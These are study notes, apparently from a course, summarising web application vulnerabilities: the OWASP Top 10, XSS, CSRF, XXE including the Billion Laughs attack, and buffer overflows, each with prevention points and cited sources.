5. Web applications vulnerabilities and countermeasures - Part 1¶
Web Security Basics 1 2 3¶
- OWASP:
- Open Web Application Security Project.
- Started in 2001.
- SSDLC :
- Secure Software Development Life Cycle.
- OWASP Top 10 Vulnerabilities 1:
- A1: Injection.
- A2: Broken Authentication.
- A3: Sensitive Data Exposure.
- A4: XML External Entities (XXE).
- A5: Broken Access Control.
- A6: Security Misconfiguration.
- A7: Cross-Site Scripting (XSS).
- A8: Insecure Deserialization.
- A9: Using Components with Known Vulnerabilities.
- A10: Insufficient Logging and Monitoring.
- Use https://nvd.nist.gov/ to check for vulnerabilities.
- CVSS:
- Common Vulnerability Scoring System.
- A score from 0 to 10.
- 0: No impact.
- 10: Critical impact.
- Attackers Classifications 3, based on their knowledge, motivation, resources, and method of operations:
- Script Kiddies:
- Amateur attackers.
- Motivation: Fun, spread chaos, and gain reputation.
- Limited knowledge, use existing tools and look for easy targets.
- No motivation to access sensitive data.
- Black-Hat Attackers:
- Professional attackers.
- Motivation: Financial gain.
- Advanced knowledge, use of illegal and unethical methods.
- More involved in organized crime.
- White-Hat Attackers:
- Professional attackers.
- Motivation: Financial gain.
- Advanced knowledge; use of legal and ethical methods.
- Help eliminate vulnerabilities by reporting them.
- Hacktivists.
- Organized Crime.
- Nation States.
- Insiders.
- Competitors.
- Script Kiddies:
- Attackers Classifications 3, based on their targets:
- Opportunistic:
- Attackers who target any vulnerable system, that is, choose their targets randomly.
- Use automated tools to scan the internet for vulnerable systems.
- Use the vulnerabilities to gain access to the system.
- Use the system to launch attacks on other systems.
- Targeted:
- Attackers who target a specific system, that is, choose their targets carefully.
- Use social engineering to gain access to the system.
- Opportunistic:
- Recommendations about web security:
- Use vulnerability scanners to scan your web application.
- Prioritize web security over network security: there are far fewer successful network attacks than web attacks.
- Web Application Firewall (WAF) is a must, but it is not enough.
Cross-Site Scripting (XSS) 4 5 6 7¶
- XSS 4:
- It is a type of injection attack.
- The malicious script runs on the client side (the victim’s browser), but it may be saved to the server and run every time a certain page/end-point is requested.
- The main purpose of XSS is to steal cookies, session tokens, and other sensitive information.
- Mostly done with HTML and JavaScript.
- The attacker places a malicious script in the web application, and the victim’s browser executes it and sends the results to the attacker.
- Recommended Tools for XSS:
- Intruder: a vulnerability scanner.
- ManageEngine: a vulnerability scanner, with suggestions for fixing the vulnerabilities.
- Prevention of XSS 4:
- Data validation.
- Filtering user input.
- Escaping user input.
- XSS types5:
- Reflected XSS: the malicious script is reflected on the page and executed on the client side; it is not saved on the server.
- Stored XSS: the malicious script is saved on the server and executed every time a certain page/end-point is requested.
- Dom XSS: client-side code injection vulnerability, malicious code is not saved; a legitimate script is executed and then the malicious script is executed by modifying the URL of the page.
Cross-Site Request Forgery (CSRF) 8 9 10¶
- Also named Session Riding or One-Click Attack or Sea-Surf or XSRF. 8
- CRSF 8:
- It is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
- With a little help from social engineering, the attacker tricks the victim into clicking on a link that executes an unwanted action.
- The Attacker can NOT see the response or see your data, so the attack helps the attacker to change the state of your data.
- Prevention measures that do NOT work 9:
- Using secret cookies: the server can not tell if the request is legitimate or not.
- Only accepting POST requests: the attacker can still send a POST request, although it is a bit harder.
- Multi-step transactions.
- URL rewriting.
- HTTPS: HTTPS itself does nothing to prevent CSRF.
- Referrer header checking: this does not work as the referrer header is not always sent or can be spoofed.
XML Injection 11 12 13 14¶
- Also known as XML External Entity (XXE), or CWE-611 11.
- XXE 11:
- An attack that abuses features of XML parsers/data.
- A website that accepts XML input and processes it using a weakly configured XML parser is vulnerable to XXE.
- The Billion Laughs Attack 12:
- A type of XXE attack.
- The attacker sends a malicious XML file that contains a large number of nested entities.
- The XML parser will try to expand the entities, and this will cause a Denial of Service (DoS).
- Sending 1KB of deeply nested XML entities can cause the parser to expand it to 3GB of data, which may cause the server to crash.
- An attacker may use XXE to 12:
- Cause a DoS.
- Access local files (on the server).
- Generate network connections to other machines.
- Alter firewall configurations.
- Port scanning.
- Server Side Request Forgery (SSRF).
- Famous attacks 13:
- Billion Laughs.
- YAML Bombs.
- Quadratic Blowup.
- External Entity Expansion.
- DTD Retrieval (Document Type Definition Retrieval): referencing an external DTD file that contains malicious code.
- Decompression Bombs: a compressed file that expands to a very large size.
- XPath Injection: an attack that injects malicious code into an XPath query.
- XInclude: XInclude is a way to include XML files inside other XML files.
- XSLT Injection: an attack that injects malicious code into an XSLT stylesheet, XSLT is a fully Turing complete language.
Buffer Overflow 15 16 17¶
- Buffer Overflow 15:
- A process that writes data more than the allocated buffer size.
- The extra data is written to adjacent memory locations and overwrites the data in these locations.
- The attacker can: Control, Crash, or Corrupt a process.
- Buffer overflow types (according to the location of the infected buffer) 15:
- Stack-based.
- Heap-based.
- Integer overflow.
- Format string.
- Unicode.
- Prevention of buffer overflow attacks 15:
- Use OS runtime protections.
- Keep updating the OS.
- Follow the principle of least privileges.
- Use memory-safe languages: Java, C#, Python, Ruby, etc.
- Validate input data.
- In a classic buffer overflow exploit, the attacker sends data to a program, which it stores in an undersized stack buffer. The result is that information on the call stack is overwritten, including the function’s return pointer. The data sets the value of the return pointer so that when the function returns, it transfers control to malicious code contained in the attacker’s data 17.
References¶
-
Edureka! (2020, July 13). Top web applications vulnerabilities | web application vulnerabilities for beginners | edureka [Video]. YouTube. https://www.youtube.com/watch?v=loyVGklGpjU&t=2s ↩↩
-
GoDaddy. (2020, January 15). Important features you need for website security [Video]. YouTube. https://www.youtube.com/watch?v=PTna1uuyWSg ↩
-
Nidecki, T. A. (2021, September 9). Web security basics: Is your web application safe? Acunetix. https://www.acunetix.com/blog/web-security-zone/web-security-basics/ ↩↩↩
-
Cross-site scripting (XSS) attack tutorial with examples, types and prevention. (2021, November 29). Software testing helps. https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/ ↩↩↩
-
Edureka! (2019, December 10). What is cross-site scripting?| cross-site scripting attack | cross-site scripting tutorial | edureka [Video]. YouTube. https://www.youtube.com/watch?v=cWu_FJUrH5Y ↩↩
-
KristanS., Manico, J., Williams, J., Wichers, D., Weidman, A., Roman., Jex, A., Smith, A., Knutson, J., Imifos., Yalon, E., Kingthorin., & Khanna, V. (n.d.). Cross-site scripting (XSS). Open Web Application Security Project. https://owasp.org/www-community/attacks/xss/ licensed under Creative Commons Attribution – ShareAlike 4.0. ↩
-
Secure Code Warrior. (2017, August 25). Cross-site scripting (XSS) | Owasp top 10 explainer video | secure code warrior [Video]. YouTube. https://www.youtube.com/watch?v=H22cJTqCgUA ↩
-
Fullstack Academy. (2017, September 29). CSRF tutorial - a guide to better understand and defend against cross-site request forgery (CSRF) [Video]. YouTube. https://www.youtube.com/watch?v=13QPmRuhbhU ↩↩↩
-
KristanS., Wichers, D., Davisnw., Petefish, P., Weidman, A., Brooks, M., Mir, A., Dc., D0ubl3 h3lix, Manico, J., Gilbert, R., Tgondrom., Krawczyk, P., Brandt, Minhaz, A. V., Lorenzo, K., Smith, A., Schelin, C., Elias-Bachrach, A., Sarciszewski., kingthorin & Spatafora, B. (2021). Cross-site request forgery (CSRF). OWASP. https://owasp.org/www-community/attacks/csrf. licensed under Creative Commons Attribution – ShareAlike 4.0. ↩↩
-
Udacity. (2016, June 6). XSRF cross-site request forgery [Video]. YouTube. https://www.youtube.com/watch?v=9JrzPX1pVjs ↩
-
AppSecAcademy. (2019, February 21). #1 XML external entity (XXE) in 2 minutes | AppSec academy [Video]. YouTube. https://www.youtube.com/watch?v=_gfhgWvI6XI ↩↩↩
-
F5DevCentral. (2018, January 18). OWASP top 10: XML external entities [Video]. YouTube. https://www.youtube.com/watch?v=g2ey7ry8_CQ ↩↩↩
-
Mgeeky. (n.d.). XML vulnerabilities and attacks cheat sheet. GitHub Gist. https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870 ↩↩
-
XML external entity (XXE) injection. (n.d.). PortSwigger. https://portswigger.net/web-security/xxe ↩
-
Eye on Tech. (2021, September 23). What is a buffer overflow attack? [Video]. YouTube. https://www.youtube.com/watch?v=YNkjX2Wqgh0 ↩↩↩↩
-
W3w3w3. (2020, January 29). Buffer overflow attack tutorial - 0x00 [Video]. YouTube. https://www.youtube.com/watch?v=j7AEzGKuKUU ↩
-
Buffer overflow. (2021). Open Web Application Security Project. https://owasp.org/www-community/vulnerabilities/Buffer_Overflow licensed under Creative Commons Attribution- ShareAlike 4.0. ↩↩